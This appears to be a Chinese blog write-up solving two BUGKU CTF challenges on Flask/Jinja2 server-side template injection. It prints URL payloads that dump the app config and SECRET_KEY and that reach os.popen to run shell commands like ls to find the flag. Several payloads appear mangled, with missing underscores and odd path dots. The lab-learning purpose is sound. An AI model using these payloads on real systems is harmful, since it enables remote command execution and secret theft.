BUGKU Simple_SSTI_1
查看网页源代码
提示需要传一个flag参数,Flask 是一个微型的 Python 开发的 Web 框架,
由上可知flag在secret_key下,config是flask模板中的一个全局对象而使用
/?flag={
{config.items()}} 读取配置文件可得到,其数据,flag也在里面
/?flag={
{config.SECRET_KEY}} 可直接得到flag
Simple_SSTI_2
同样提示需要传一个flag参数
查看网页源代码没什么有用的东西我感觉
传入错误的语句python的flask模板注入,jinja2
构造一个参数被执行说明这个存在ssti注入
查看flask与ssti的相关知识详情参考以下链接
https://blog.csdn.net/weixin_51353029/article/details/111503731?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522164749748316780357215631%2522%252C%2522scm%2522%253A%252220140713.130102334…%2522%257D&request_id=164749748316780357215631&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2alltop_positive~default-1-111503731.142v2pc_search_result_control_group,143v4control&utm_term=ssti&spm=1018.2226.3001.4187
?flag={
{ config.class.init.globals[‘os’].popen(‘ls …/’).read() }}
我的理解是返回这个对象初始化包含的全局变量的列表察看模式
popen方法通过p.read()获取终端输出,而且popen需要关闭close().当执行成功时,close()不返回任何值,失败时,close()返回系统返回值(失败返回1). 可见它获取返回值的方式和os.system不同。
后面这个其实理解还是没有那么透彻,如果有哪位同仁是对其比较了解的话可以在评论区告知一下谢谢
发现有个app的文件夹
/?flag={
{ config.class.init.globals[‘os’].popen(‘ls …/app’).read() }}
发现flag在app里面
/?flag={
{ config.class.init.globals[‘os’].popen(‘ls …/app/flag’).read() }}
文章评论